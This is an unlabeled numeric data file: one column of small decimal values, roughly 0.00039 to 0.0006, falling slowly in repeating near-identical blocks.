0.000587236
0.00058344
0.000574668
0.000575053
0.000578457
0.000578459
0.000574821
0.000578619
0.000574822
0.000587213
0.000587441
0.000583395
0.000583601
0.000587446
0.000587221
0.000583601
0.000592358
0.000596122
0.000596244
0.000592123
0.000592162
0.00059603
0.000592261
0.000592391
0.000592184
0.000596222
0.000595995
0.000592179
0.000595995
0.000592386
0.000587247
0.000583378
0.000587494
0.000583479
0.000587465
0.000587343
0.00058357
0.000587217
0.000587441
0.000583598
0.000583396
0.000587221
0.000587449
0.000583601
0.000592357
0.000596119
0.000596239
0.000592125
0.000596027
0.000592159
0.000592263
0.000592393
0.000592184
0.000595994
0.000596221
0.000595996
0.000592386
0.000592179
0.00058725
0.000583379
0.000587497
0.000583483
0.000587466
0.000583571
0.000587348
0.000574829
0.000578657
0.000578431
0.000574618
0.00057843
0.000574615
0.000574819
0.000569691
0.00056592
0.000569931
0.000565814
0.000569783
0.0005699
0.000566012
0.000574798
0.000578677
0.000578555
0.00057456
0.000574699
0.000578466
0.000574597
0.000569658
0.000569881
0.000565838
0.000566041
0.000569887
0.00056966
0.000566046
0.000574825
0.000578427
0.000578657
0.000574616
0.000578429
0.000574817
0.000574612
0.000569686
0.000565917
0.000569932
0.000565813
0.000569898
0.00056978
0.00056601
0.000574795
0.000578677
0.000578557
0.000574563
0.000578465
0.000574596
0.0005747
0.000569652
0.000569879
0.000566044
0.000565833
0.000569662
0.000569881
0.000566042
0.00058722
0.000587441
0.000583601
0.000583392
0.000587226
0.000587445
0.000583603
0.000592358
0.000596121
0.000596242
0.000592124
0.000592261
0.000596029
0.000592159
0.000592395
0.000592183
0.000595995
0.000596222
0.000592389
0.000595997
0.000592178
0.000587247
0.000583376
0.000587495
0.000583482
0.000587344
0.000587462
0.000583569
0.000574826
0.000578657
0.00057843
0.000574614
0.000578431
0.000574611
0.000574818
0.000569686
0.000565921
0.000569933
0.000565818
0.000566014
0.000569782
0.0005699
0.000574797
0.000578681
0.000578562
0.000574562
0.000578471
0.000574702
0.000574598
0.000569652
0.000569877
0.000565837
0.000566044
0.000566046
0.000569882
0.000569659
0.000574825
0.00057843
0.000578654
0.000574617
0.00057843
0.000574819
0.000574611
0.000569688
0.000565916
0.000569929
0.000565812
0.000569899
0.000569782
0.000566008
0.000574796
0.000578679
0.00057856
0.000574559
0.000578467
0.000574597
0.0005747
0.000569651
0.000569878
0.000566041
0.000565832
0.000569658
0.000569883
0.000566039
0.0005874
0.00058698
0.000583597
0.000583594
0.000587238
0.00058724
0.00058344
0.000574663
0.000575053
0.000578449
0.00057845
0.000574816
0.000578612
0.000574815
0.000587216
0.000587437
0.0005836
0.00058339
0.000587221
0.000587441
0.000583601
0.000592355
0.00059612
0.000596235
0.00059212
0.000592259
0.000596027
0.000592153
0.000592393
0.000592181
0.000595997
0.000596215
0.000592387
0.000595998
0.000592173
0.000587247
0.000583373
0.000587491
0.000583478
0.000587341
0.000587458
0.000583571
0.000574825
0.00057843
0.000578654
0.000574612
0.000578431
0.000574815
0.00057461
0.000569685
0.000565919
0.000569933
0.000565814
0.000566011
0.000569781
0.000569899
0.000574796
0.000578676
0.000578559
0.00057456
0.000578469
0.000574701
0.000574595
0.000569652
0.000569876
0.000566044
0.000565833
0.000566047
0.000569657
0.00056988
0.000574825
0.00057843
0.000578656
0.000574615
0.000578431
0.000574816
0.000574613
0.000569687
0.000565917
0.00056993
0.000565813
0.000569898
0.00056978
0.000566008
0.000574798
0.000578676
0.000578556
0.000574559
0.000578468
0.000574596
0.0005747
0.000569648
0.000569875
0.000566038
0.000565831
0.000569655
0.000569878
0.000566036
0.000574656
0.000575053
0.000578449
0.000578448
0.000578607
0.000574813
0.000574812
0.000552274
0.000551858
0.000548474
0.000548473
0.000548315
0.000552118
0.000552118
0.000539536
0.000539927
0.000543327
0.000543326
0.000543488
0.000539691
0.000539687
0.000552092
0.00055232
0.000548273
0.000548479
0.000552325
0.0005521
0.000548479
0.000557236
0.000561001
0.000561123
0.000557001
0.00055704
0.00056091
0.00055714
0.000557271
0.000557062
0.000561101
0.000560871
0.00055706
0.000560876
0.000557265
0.000552127
0.000548255
0.000552372
0.000548358
0.000552344
0.000552223
0.000548449
0.000552094
0.00055232
0.000548272
0.000548481
0.000552325
0.000552101
0.00054848
0.000557237
0.000560998
0.00056112
0.000556999
0.000560909
0.000557038
0.000557139
0.000557271
0.000557062
0.000561096
0.000560873
0.000560874
0.000557056
0.000557265
0.000552126
0.000548255
0.000552371
0.000548359
0.000552341
0.000548449
0.00055222
0.000539704
0.000543536
0.000543305
0.000539493
0.000543308
0.000539491
0.000539691
0.000534563
0.00053079
0.000534806
0.000530685
0.000534657
0.000534774
0.000530882
0.000539673
0.000543554
0.000543436
0.000539435
0.000539577
0.000543347
0.000539472
0.000534528
0.000534752
0.000530706
0.000530917
0.000534758
0.000534531
0.000530915
0.000539704
0.000543532
0.000543305
0.000539494
0.000543306
0.00053949
0.000539694
0.000534564
0.000530789
0.000534805
0.000530687
0.000534775
0.000534655
0.000530884
0.000539672
0.000543553
0.000543434
0.000539436
0.000543342
0.000539472
0.000539575
0.00053453
0.000534754
0.000530709
0.000530915
0.000534761
0.000534532
0.000530917
0.00055227
0.000551854
0.000548468
0.000548465
0.000552111
0.000552112
0.000548311
0.000539532
0.000539927
0.000543322
0.000543321
0.000539687
0.000543485
0.000539687
0.000552092
0.000552314
0.000548269
0.000548476
0.000552318
0.000552099
0.000548478
0.000557233
0.000560997
0.000561115
0.000556998
0.000557033
0.000560906
0.000557137
0.000557269
0.000557058
0.000561097
0.000560869
0.000557053
0.000560874
0.000557264
0.000552123
0.000548252
0.00055237
0.000548356
0.000552337
0.000552219
0.000548446
0.000552094
0.000552316
0.00054848
0.000548268
0.000552102
0.00055232
0.000548481
0.000557235
0.000560997
0.000561115
0.000556996
0.000560908
0.000557031
0.000557136
0.00055727
0.000557059
0.00056087
0.000561096
0.000560873
0.000557264
0.000557053
0.000552124
0.000548248
0.000552366
0.000548354
0.000552334
0.000548447
0.000552217
0.000539703
0.000543531
0.000543308
0.000539492
0.000543307
0.000539488
0.000539698
0.000534563
0.000530791
0.000534805
0.000530686
0.000534655
0.000534774
0.000530883
0.000539672
0.000543551
0.000543431
0.000539436
0.000539573
0.000543341
0.00053947
0.000534527
0.000534753
0.000530706
0.000530914
0.000534758
0.000534535
0.000530913
0.000539705
0.000543308
0.00054353
0.000539491
0.00054331
0.000539694
0.000539487
0.000534562
0.000530789
0.000534804
0.000530685
0.000534772
0.000534656
0.000530881
0.000539673
0.000543549
0.00054343
0.000539434
0.000543342
0.000539469
0.000539575
0.000534528
0.000534751
0.000530914
0.000530705
0.000534531
0.000534756
0.000530915
0.000552089
0.000552311
0.000548472
0.000548263
0.000552095
0.000552314
0.000548476
0.000557228
0.000560995
0.000561111
0.000556993
0.000557132
0.000560902
0.000557027
0.000557265
0.000557055
0.00056087
0.000561093
0.000557259
0.00056087
0.000557049
0.000552118
0.000548243
0.000552364
0.00054835
0.000552214
0.000552329
0.000548442
0.000539698
0.000543528
0.000543301
0.000539486
0.000543302
0.000539484
0.000539688
0.000534557
0.000530789
0.000534801
0.000530683
0.000530883
0.000534653
0.000534767
0.000539666
0.000543549
0.000543428
0.000539432
0.000543338
0.000539569
0.000539465
0.000534523
0.000534748
0.000530705
0.000530913
0.000530917
0.000534751
0.000534529
0.000539698
0.000543301
0.000543526
0.000539486
0.000543305
0.000539689
0.000539482
0.000534557
0.000530786
0.000534801
0.000530683
0.000534769
0.000534652
0.000530879
0.000539669
0.000543545
0.000543429
0.000539429
0.000543341
0.000539465
0.000539571
0.00053452
0.000534747
0.000530911
0.000530703
0.000534528
0.00053475
0.00053091
0.000552273
0.000551857
0.000548472
0.000548473
0.000552117
0.000552115
0.000548313
0.000539534
0.000539929
0.000543324
0.000543326
0.000539691
0.000543484
0.00053969
0.00055209
0.000552313
0.000548476
0.000548268
0.000552098
0.000552316
0.000548477
0.00055723
0.000560994
0.000561113
0.000556995
0.000557133
0.000560902
0.00055703
0.000557265
0.000557056
0.000560869
0.000561092
0.000557262
0.000560869
0.000557049
0.00055212
0.000548254
0.000552367
0.000548356
0.000552215
0.000552334
0.000548446
0.000539699
0.000543302
0.000543528
0.000539487
0.000543305
0.000539691
0.000539485
0.00053456
0.000530793
0.000534803
0.000530689
0.000530886
0.000534654
0.000534773
0.000539671
0.000543548
0.000543431
0.000539431
0.000543342
0.000539573
0.000539468
0.000534523
0.00053475
0.000530916
0.000530707
0.000530915
0.000534533
0.000534754
0.000539697
0.000543303
0.00054353
0.000539489
0.000543304
0.000539689
0.000539487
0.000534556
0.000530788
0.000534803
0.000530684
0.000534772
0.000534653
0.000530877
0.00053967
0.000543555
0.000543433
0.000539433
0.000543342
0.000539473
0.000539574
0.000534519
0.000534749
0.000530911
0.000530704
0.000534527
0.000534755
0.000530908
0.000539531
0.000539923
0.000543323
0.000543326
0.000543485
0.000539684
0.000539686
0.000517141
0.000516729
0.000513347
0.000513343
0.000513183
0.000516985
0.000516985
0.000504404
0.000504793
0.000508195
0.000508196
0.000508355
0.000504559
0.000504557
0.000516961
0.000517185
0.000513134
0.000513342
0.000517187
0.000516967
0.000513343
0.000522104
0.000525867
0.000525983
0.000521866
0.0005219
0.000525777
0.000522005
0.000522141
0.000521929
0.000525965
0.000525745
0.000521922
0.000525747
0.000522136
0.000516994
0.000513117
0.000517237
0.000513225
0.000517204
0.000517089
0.000513314
0.000516958
0.000517184
0.000513136
0.000513342
0.000517187
0.000516965
0.000513344
0.000522103
0.000525866
0.000525985
0.000521867
0.000525777
0.000521903
0.000522006
0.00052214
0.000521929
0.000525968
0.000525744
0.000525747
0.000521924
0.000522134
0.00051699
0.000513118
0.000517237
0.000513222
0.000517206
0.000513312
0.000517085
0.000504562
0.000508394
0.000508168
0.000504355
0.000508168
0.000504347
0.000504557
0.000499424
0.000495652
0.000499667
0.000495546
0.000499519
0.000499635
0.000495744
0.000504534
0.000508417
0.000508299
0.000504299
0.000504439
0.000508206
0.000504333
0.000499388
0.000499614
0.000495564
0.000495778
0.000499615
0.000499396
0.000495776
0.000504567
0.000508396
0.000508168
0.000504358
0.000508172
0.000504352
0.000504558
0.000499425
0.00049565
0.000499666
0.000495548
0.000499636
0.000499516
0.000495744
0.000504534
0.000508415
0.000508296
0.000504298
0.000508205
0.000504333
0.000504438
0.00049939
0.000499616
0.000495568
0.000495779
0.000499621
0.000499398
0.000495776
0.000517135
0.000516726
0.000513336
0.000513335
0.000516981
0.000516979
0.000513176
0.000504395
0.000504792
0.000508189
0.000508189
0.000504553
0.000508349
0.000504551
0.000516961
0.000517185
0.000513135
0.000513344
0.000517186
0.000516967
0.000513348
0.000522103
0.000525869
0.000525985
0.000521867
0.000521901
0.000525776
0.000522008
0.000522138
0.000521929
0.000525965
0.00052574
0.000521921
0.000525742
0.000522132
0.000516991
0.000513116
0.000517236
0.000513223
0.000517203
0.000517087
0.000513314
0.00051696
0.000517185
0.000513344
0.000513135
0.000516968
0.000517187
0.000513344
0.000522103
0.000525865
0.000525984
0.000521866
0.000525775
0.0005219
0.000522005
0.000522138
0.000521928
0.000525739
0.000525966
0.000525744
0.000522133
0.000521921
0.000516991
0.000513116
0.000517236
0.000513221
0.000517202
0.000513312
0.000517086
0.000504566
0.000508395
0.000508172
0.000504354
0.000508174
0.000504349
0.000504555
0.000499422
0.000495652
0.000499668
0.000495547
0.000499517
0.000499635
0.000495743
0.000504534
0.000508414
0.000508298
0.0005043
0.000504439
0.000508207
0.000504333
0.000499388
0.000499612
0.000495564
0.000495778
0.000499615
0.000499394
0.000495775
0.000504566
0.000508171
0.000508394
0.000504354
0.000508171
0.000504557
0.000504349
0.000499425
0.000495653
0.000499667
0.000495547
0.000499635
0.000499519
0.000495745
0.000504537
0.000508415
0.000508295
0.000504299
0.000508207
0.000504333
0.000504438
0.000499387
0.000499612
0.000495778
0.000495566
0.000499395
0.000499616
0.000495776
0.000516959
0.000517181
0.000513336
0.000513134
0.00051696
0.000517191
0.00051334
0.000522103
0.000525865
0.000525984
0.000521864
0.000522004
0.000525776
0.000521901
0.000522139
0.000521926
0.000525736
0.000525967
0.000522127
0.000525742
0.000521925
0.000516992
0.000513116
0.000517234
0.000513219
0.000517085
0.000517205
0.00051331
0.000504561
0.000508398
0.000508165
0.000504349
0.000508168
0.000504351
0.000504552
0.000499422
0.000495649
0.000499663
0.000495546
0.000495745
0.000499515
0.000499633
0.000504534
0.00050842
0.000508299
0.000504295
0.000508208
0.000504437
0.000504334
0.000499384
0.00049961
0.000495568
0.000495774
0.000495776
0.000499618
0.00049939
0.000504559
0.000508164
0.000508392
0.000504351
0.000508166
0.000504555
0.000504344
0.000499419
0.00049565
0.000499664
0.000495544
0.00049963
0.000499516
0.000495741
0.000504528
0.000508412
0.000508295
0.000504295
0.000508202
0.000504329
0.000504435
0.000499382
0.00049961
0.000495775
0.00049556
0.000499394
0.00049961
0.00049577
0.000517139
0.000516721
0.000513337
0.000513336
0.000516979
0.00051698
0.000513179
0.0005044
0.000504793
0.000508185
0.000508188
0.000504553
0.000508351
0.000504553
0.00051696
0.00051718
0.000513342
0.00051313
0.000516966
0.000517183
0.000513344
0.0005221
0.000525863
0.000525983
0.000521863
0.000522
0.000525772
0.000521898
0.000522135
0.000521924
0.000525739
0.000525963
0.000522129
0.000525741
0.000521919
0.00051699
0.000513113
0.000517231
0.000513219
0.000517081
0.000517199
0.000513311
0.000504563
0.000508168
0.000508394
0.000504351
0.00050817
0.000504553
0.000504349
0.000499422
0.000495655
0.000499669
0.000495551
0.000495746
0.000499518
0.000499636
0.000504534
0.000508415
0.000508297
0.000504298
0.000508207
0.000504437
0.000504332
0.000499388
0.000499614
0.00049578
0.000495571
0.000495779
0.000499394
0.000499619
0.000504563
0.000508169
0.000508391
0.000504352
0.00050817
0.000504555
0.000504347
0.000499422
0.00049565
0.000499665
0.000495544
0.000499632
0.000499516
0.000495742
0.000504534
0.000508412
0.000508295
0.000504295
0.000508206
0.000504331
0.000504437
0.000499389
0.000499614
0.00049578
0.000495565
0.000499396
0.000499615
0.000495778
0.000504393
0.00050479
0.000508185
0.000508185
0.000508345
0.000504547
0.000504548
0.000481998
0.000481588
0.000478197
0.000478197
0.000478037
0.000481842
0.000481843
0.000469255
0.000469651
0.000473047
0.000473048
0.000473207
0.000469411
0.000469413
0.000481821
0.000482042
0.000477992
0.0004782
0.000482045
0.000481824
0.000478204
0.000486963
0.000490729
0.000490845
0.000486725
0.00048676
0.000490638
0.000486864
0.000486998
0.000486787
0.000490825
0.0004906
0.000486781
0.000490603
0.00048699
0.00048185
0.000477974
0.000482095
0.00047808
0.000482062
0.000481945
0.00047817
0.000481817
0.000482041
0.000477993
0.000478197
0.000482046
0.000481822
0.0004782
0.00048696
0.000490725
0.000490844
0.000486727
0.000490634
0.000486761
0.000486865
0.000486996
0.000486786
0.000490826
0.0004906
0.000490603
0.000486781
0.00048699
0.000481849
0.000477977
0.000482096
0.000478081
0.000482065
0.00047817
0.000481946
0.000469422
0.000473253
0.000473025
0.000469212
0.00047303
0.000469207
0.000469414
0.00046428
0.000460507
0.000464526
0.000460405
0.000464374
0.000464493
0.000460601
0.000469391
0.000473273
0.000473156
0.000469156
0.000469294
0.000473066
0.000469189
0.000464244
0.000464471
0.000460423
0.000460634
0.000464474
0.000464252
0.000460632
0.000469421
0.000473252
0.000473024
0.000469212
0.000473026
0.000469206
0.000469414
0.000464278
0.000460508
0.000464524
0.000460403
0.000464491
0.000464373
0.000460599
0.000469391
0.000473273
0.000473153
0.000469156
0.000473063
0.00046919
0.000469295
0.000464243
0.00046447
0.000460421
0.000460632
0.000464471
0.000464252
0.00046063
0.000481995
0.000481586
0.000478197
0.000478195
0.000481838
0.000481841
0.000478035
0.000469256
0.000469652
0.000473049
0.000473049
0.000469412
0.000473208
0.000469412
0.00048182
0.000482043
0.000477993
0.000478201
0.000482047
0.000481824
0.000478204
0.000486964
0.000490728
0.000490847
0.000486727
0.000486762
0.000490637
0.000486866
0.000486999
0.000486787
0.000490824
0.000490601
0.00048678
0.000490603
0.000486992
0.000481852
0.000477976
0.000482095
0.000478081
0.000482064
0.000481946
0.000478174
0.000481822
0.000482043
0.0004782
0.000477998
0.000481824
0.000482048
0.000478207
0.000486965
0.000490728
0.000490845
0.000486728
0.000490637
0.000486762
0.000486867
0.000487002
0.000486787
0.000490601
0.000490826
0.000490607
0.000486992
0.000486782
0.000481853
0.000477985
0.000482098
0.000478085
0.000482066
0.000478177
0.000481947
0.000469421
0.000473252
0.00047303
0.000469213
0.000473029
0.000469208
0.000469415
0.000464281
0.00046051
0.000464524
0.000460405
0.000464377
0.000464494
0.000460602
0.000469394
0.000473275
0.000473155
0.000469156
0.000469297
0.000473067
0.000469192
0.000464244
0.000464471
0.000460423
0.000460635
0.000464474
0.000464252
0.000460633
0.000469426
0.000473029
0.000473261
0.000469216
0.000473032
0.000469418
0.000469214
0.000464285
0.000460513
0.000464526
0.000460407
0.000464497
0.000464379
0.000460603
0.000469396
0.000473284
0.000473159
0.00046916
0.00047307
0.000469198
0.0004693
0.000464247
0.000464473
0.000460634
0.000460426
0.000464253
0.00046448
0.000460632
0.000481815
0.000482038
0.000478199
0.000477989
0.00048182
0.000482041
0.0004782
0.00048696
0.000490727
0.000490843
0.000486723
0.000486862
0.000490637
0.000486757
0.000486994
0.000486782
0.000490601
0.000490821
0.000486987
0.000490602
0.000486776
0.000481847
0.000477972
0.000482093
0.000478079
0.000481942
0.00048206
0.000478169
0.000469423
0.000473248
0.000473031
0.000469209
0.00047303
0.000469203
0.000469419
0.000464278
0.00046051
0.000464524
0.000460404
0.000460603
0.000464374
0.00046449
0.000469392
0.000473268
0.000473153
0.000469153
0.000473064
0.000469295
0.000469188
0.000464244
0.00046447
0.000460423
0.000460641
0.000460637
0.000464471
0.000464257
0.000469425
0.00047303
0.00047325
0.000469212
0.000473029
0.000469419
0.000469204
0.000464281
0.000460511
0.000464526
0.000460405
0.000464491
0.000464378
0.000460602
0.000469391
0.000473271
0.000473155
0.000469156
0.000473064
0.000469188
0.000469296
0.000464251
0.000464471
0.000460637
0.000460423
0.000464257
0.000464473
0.000460636
0.000481995
0.000481587
0.000478197
0.0004782
0.000481841
0.000481837
0.000478038
0.000469258
0.000469655
0.00047305
0.000473055
0.000469415
0.000473211
0.000469416
0.000481821
0.000482044
0.000478207
0.000477996
0.000481828
0.000482048
0.000478207
0.000486962
0.000490726
0.000490844
0.000486727
0.000486865
0.000490636
0.000486761
0.000486998
0.000486788
0.000490603
0.000490827
0.000486991
0.000490606
0.000486783
0.000481851
0.000477977
0.000482095
0.000478081
0.000481944
0.000482063
0.000478175
0.000469425
0.000473034
0.000473257
0.000469215
0.000473034
0.00046942
0.00046921
0.000464283
0.000460515
0.000464528
0.00046041
0.000460608
0.000464379
0.000464497
0.000469395
0.00047328
0.00047316
0.000469159
0.000473068
0.0004693
0.000469196
0.000464248
0.000464475
0.000460638
0.000460431
0.00046064
0.000464256
0.000464478
0.000469429
0.000473034
0.000473256
0.000469216
0.000473034
0.00046942
0.000469212
0.000464287
0.000460514
0.000464528
0.000460411
0.000464495
0.000464379
0.000460609
0.0004694
0.000473275
0.000473157
0.000469158
0.000473071
0.000469194
0.000469301
0.000464253
0.000464476
0.000460636
0.000460433
0.000464256
0.00046448
0.000460641
0.000469258
0.000469654
0.000473051
0.000473052
0.00047321
0.000469414
0.000469416
0.000446856
0.000446446
0.000443057
0.000443054
0.000442897
0.0004467
0.0004467
0.000434118
0.000434512
0.000437907
0.000437906
0.000438069
0.000434273
0.000434271
0.000446675
0.0004469
0.000442857
0.000443059
0.000446906
0.000446681
0.000443062
0.000451822
0.000455585
0.000455704
0.000451584
0.000451621
0.000455495
0.000451724
0.000451854
0.000451646
0.000455683
0.00045546
0.000451639
0.000455462
0.000451851
0.000446711
0.000442841
0.000446955
0.000442942
0.000446926
0.000446806
0.000443033
0.000446675
0.000446899
0.000442849
0.000443059
0.000446902
0.000446683
0.000443061
0.00045182
0.000455584
0.000455702
0.000451584
0.000455493
0.000451618
0.000451724
0.000451855
0.000451645
0.000455681
0.000455457
0.000455459
0.000451638
0.00045185
0.000446706
0.000442832
0.000446954
0.000442939
0.00044692
0.000443027
0.000446804
0.000434286
0.000438119
0.000437886
0.000434074
0.000437889
0.000434076
0.000434273
0.000429143
0.00042537
0.000429386
0.000425265
0.000429238
0.000429355
0.00042546
0.000434255
0.000438142
0.000438018
0.000434017
0.000434157
0.000437928
0.000434056
0.00042911
0.000429333
0.000425288
0.000425492
0.000429343
0.000429112
0.000425494
0.000434286
0.000438111
0.000437886
0.000434073
0.000437891
0.000434069
0.000434276
0.000429142
0.00042537
0.000429385
0.000425266
0.000429352
0.000429235
0.000425465
0.000434253
0.00043813
0.000438013
0.000434015
0.000437923
0.000434049
0.000434155
0.000429109
0.000429334
0.000425289
0.000425494
0.00042934
0.000429115
0.000425495
0.000446865
0.000446441
0.000443059
0.000443056
0.000446705
0.000446704
0.0004429
0.000434118
0.000434507
0.000437908
0.000437907
0.000434272
0.000438069
0.00043427
0.00044668
0.0004469
0.000442852
0.000443063
0.000446905
0.000446684
0.000443064
0.000451821
0.000455584
0.000455701
0.000451584
0.000451618
0.000455494
0.000451723
0.000451858
0.000451645
0.000455682
0.000455461
0.000451639
0.000455463
0.000451851
0.000446711
0.000442834
0.000446952
0.000442939
0.000446921
0.000446804
0.000443032
0.000446676
0.000446899
0.000443061
0.00044285
0.000446684
0.000446902
0.000443062
0.000451821
0.000455588
0.000455704
0.000451585
0.000455495
0.000451619
0.000451726
0.000451854
0.000451644
0.00045546
0.000455683
0.00045546
0.000451851
0.000451638
0.000446708
0.000442833
0.000446954
0.00044294
0.00044692
0.00044303
0.000446805
0.000434287
0.000438114
0.00043789
0.000434074
0.000437889
0.000434073
0.000434276
0.000429144
0.000425373
0.000429387
0.000425269
0.000429237
0.000429356
0.000425464
0.000434256
0.000438135
0.000438014
0.000434018
0.000434157
0.000437926
0.000434056
0.000429111
0.000429335
0.00042529
0.000425496
0.000429342
0.000429116
0.000425496
0.000434281
0.000437888
0.000438111
0.000434071
0.000437888
0.000434273
0.000434067
0.000429145
0.000425372
0.000429385
0.000425267
0.000429355
0.000429237
0.000425465
0.000434254
0.000438132
0.000438015
0.000434017
0.000437924
0.000434052
0.000434157
0.000429105
0.000429332
0.000425496
0.000425286
0.000429113
0.000429335
0.000425496
0.000446677
0.000446901
0.00044306
0.000442854
0.000446681
0.000446905
0.000443063
0.000451822
0.000455587
0.000455704
0.000451586
0.000451724
0.000455496
0.000451621
0.000451855
0.000451644
0.00045546
0.000455684
0.000451848
0.000455464
0.00045164
0.000446711
0.000442837
0.000446955
0.000442939
0.000446804
0.000446923
0.000443034
0.000434284
0.000438111
0.000437886
0.000434069
0.00043789
0.000434065
0.000434275
0.000429141
0.00042537
0.000429384
0.000425268
0.000425465
0.000429233
0.000429351
0.000434253
0.000438132
0.000438014
0.000434015
0.000437926
0.000434154
0.000434049
0.000429107
0.000429331
0.000425287
0.000425496
0.000425496
0.000429335
0.000429115
0.00043428
0.000437888
0.000438114
0.00043407
0.000437889
0.000434274
0.000434066
0.00042914
0.00042537
0.000429386
0.000425265
0.000429353
0.000429236
0.00042546
0.000434253
0.000438138
0.000438017
0.000434017
0.000437929
0.000434054
0.000434156
0.000429104
0.000429329
0.000425491
0.000425283
0.000429111
0.000429334
0.000425491
0.000446866
0.000446445
0.00044306
0.000443059
0.000446705
0.000446706
0.000442904
0.000434119
0.000434513
0.000437908
0.000437908
0.000434274
0.000438071
0.000434273
0.00044668
0.000446904
0.000443064
0.000442858
0.000446684
0.000446913
0.000443064
0.000451827
0.000455591
0.000455713
0.000451591
0.00045173
0.000455501
0.00045163
0.000451859
0.000451649
0.00045546
0.000455695
0.000451849
0.000455468
0.00045165
0.000446715
0.00044284
0.000446958
0.000442943
0.000446809
0.00044693
0.000443034
0.000434285
0.000437894
0.000438114
0.00043407
0.000437895
0.000434278
0.000434066
0.000429143
0.000425373
0.000429386
0.000425267
0.000425467
0.000429237
0.000429354
0.000434256
0.000438133
0.000438015
0.000434016
0.00043793
0.000434158
0.000434051
0.000429107
0.000429332
0.000425501
0.000425287
0.0004255
0.000429118
0.000429335
0.00043428
0.000437891
0.000438115
0.000434072
0.000437889
0.000434275
0.000434067
0.00042914
0.00042537
0.000429386
0.000425265
0.000429354
0.000429236
0.00042546
0.000434251
0.000438135
0.000438015
0.000434018
0.000437925
0.000434052
0.000434156
0.000429104
0.000429331
0.000425496
0.000425282
0.000429113
0.000429334
0.000425491
0.000434117
0.000434511
0.000437905
0.000437906
0.000438066
0.00043427
0.000434271
0.000411716
0.000411304
0.000407916
0.000407915
0.000407755
0.000411561
0.000411561
0.000398975
0.000399367
0.000402764
0.000402765
0.000402927
0.000399127
0.000399127
0.000411538
0.000411761
0.000407711
0.000407924
0.000411764
0.000411546
0.000407922
0.000416678
0.000420446
0.000420563
0.000416445
0.000416478
0.000420352
0.000416583
0.000416716
0.000416505
0.000420544
0.000420317
0.0004165
0.000420321
0.00041671
0.000411568
0.000407692
0.000411813
0.0004078
0.00041178
0.000411665
0.000407891
0.000411535
0.00041176
0.00040771
0.00040792
0.000411764
0.000411542
0.000407919
0.000416684
0.000420446
0.000420564
0.000416445
0.000420358
0.000416482
0.000416587
0.000416717
0.000416506
0.000420545
0.000420319
0.000420323
0.0004165
0.00041671
0.00041157
0.000407698
0.000411815
0.000407802
0.000411786
0.000407892
0.000411666
0.000399142
0.000402971
0.000402749
0.000398931
0.000402749
0.000398925
0.000399134
0.000394001
0.000390229
0.000394244
0.000390122
0.000394095
0.000394211
0.00039032
0.000399112
0.000402991
0.000402875
0.000398875
0.000399014
0.000402785
0.000398909
0.000393965
0.000394189
0.000390141
0.000390352
0.000394192
0.00039397
0.000390353
0.00039914
0.00040297
0.000402748
0.00039893
0.000402744
0.000398925
0.000399134
0.000394
0.000390228
0.000394244
0.000390123
0.000394211
0.000394094
0.000390322
0.00039911
0.000402996
0.000402875
0.000398876
0.000402783
0.000398912
0.000399016
0.000393967
0.00039419
0.000390142
0.000390357
0.000394193
0.000393972
0.000390355
0.000411714
0.000411304
0.000407916
0.000407915
0.000411558
0.00041156
0.000407755
0.000398975
0.000399369
0.000402766
0.000402768
0.000399128
0.000402926
0.00039913
0.000411538
0.000411764
0.000407716
0.000407918
0.00041177
0.000411543
0.000407922
0.000416684
0.000420448
0.000420567
0.000416447
0.000416483
0.000420356
0.000416586
0.000416719
0.000416508
0.000420548
0.000420321
0.000416504
0.000420323
0.000416712
0.000411571
0.000407697
0.000411817
0.000407801
0.000411787
0.000411667
0.000407891
0.00041154
0.000411765
0.000407922
0.000407715
0.000411546
0.000411767
0.000407926
0.000416682
0.000420446
0.000420564
0.000416446
0.000420355
0.00041648
0.000416585
0.000416721
0.00041651
0.000420322
0.000420546
0.000420326
0.000416716
0.000416502
0.000411571
0.000407694
0.000411814
0.0004078
0.000411782
0.000407893
0.000411665
0.000399143
0.000402975
0.000402743
0.000398934
0.000402747
0.00039893
0.000399133
0.000394
0.000390227
0.000394245
0.000390123
0.000394093
0.000394212
0.00039032
0.00039911
0.000402993
0.000402874
0.000398877
0.000399015
0.000402782
0.00039891
0.000393965
0.000394193
0.000390144
0.000390355
0.000394196
0.000393975
0.000390353
0.000399148
0.000402748
0.000402976
0.000398935
0.000402753
0.000399134
0.000398932
0.000394004
0.000390234
0.000394247
0.000390129
0.000394215
0.000394098
0.000390326
0.000399115
0.000402993
0.000402875
0.000398878
0.000402787
0.000398913
0.000399018
0.00039397
0.000394194
0.000390357
0.000390149
0.000393973
0.000394201
0.000390357
0.000411538
0.00041176
0.000407918
0.000407715
0.000411542
0.000411768
0.000407921
0.00041668
0.000420445
0.000420563
0.000416445
0.000416582
0.000420352
0.00041648
0.000416716
0.000416504
0.000420316
0.000420541
0.000416708
0.00042032
0.0004165
0.000411571
0.0004077
0.000411815
0.000407801
0.000411665
0.000411784
0.000407893
0.000399143
0.00040297
0.000402746
0.00039893
0.000402749
0.000398927
0.000399133
0.000393999
0.000390232
0.000394244
0.000390127
0.000390324
0.000394096
0.000394213
0.00039911
0.000402991
0.000402875
0.000398875
0.000402782
0.000399015
0.000398909
0.000393966
0.000394193
0.00039015
0.000390358
0.000390358
0.000394199
0.000393972
0.000399144
0.000402745
0.000402977
0.000398932
0.000402749
0.000399135
0.000398931
0.000394
0.000390228
0.000394245
0.000390123
0.000394213
0.000394096
0.000390321
0.000399113
0.000402998
0.000402877
0.000398876
0.000402787
0.000398913
0.000399017
0.000393967
0.000394193
0.000390356
0.000390147
0.000393975
0.000394198
0.000390354
0.000411713
0.000411309
0.000407917
0.000407916
0.000411561
0.000411561
0.000407755
0.000398979
0.000399373
0.000402767
0.000402768
0.000399133
0.000402928
0.000399134
0.000411539
0.00041176
0.000407923
0.00040771
0.000411544
0.000411762
0.000407925
0.000416681
0.000420446
0.000420562
0.000416443
0.000416584
0.000420353
0.000416478
0.000416719
0.000416506
0.000420323
0.00042054
0.000416712
0.000420323
0.000416497
0.00041157
0.000407691
0.000411811
0.000407797
0.000411662
0.000411778
0.00040789
0.000399146
0.00040275
0.000402971
0.00039893
0.000402751
0.000399138
0.000398925
0.000394004
0.000390233
0.000394244
0.000390127
0.000390329
0.000394097
0.000394213
0.000399114
0.000402991
0.000402874
0.000398874
0.000402786
0.000399017
0.000398909
0.000393971
0.000394191
0.000390358
0.000390148
0.000390363
0.000393975
0.000394196
0.000399145
0.000402752
0.000402971
0.000398931
0.000402752
0.000399138
0.000398925
0.000394001
0.000390231
0.000394244
0.000390123
0.00039421
0.000394095
0.000390322
0.00039911
0.000402988
0.00040287
0.000398874
0.000402782
0.000398906
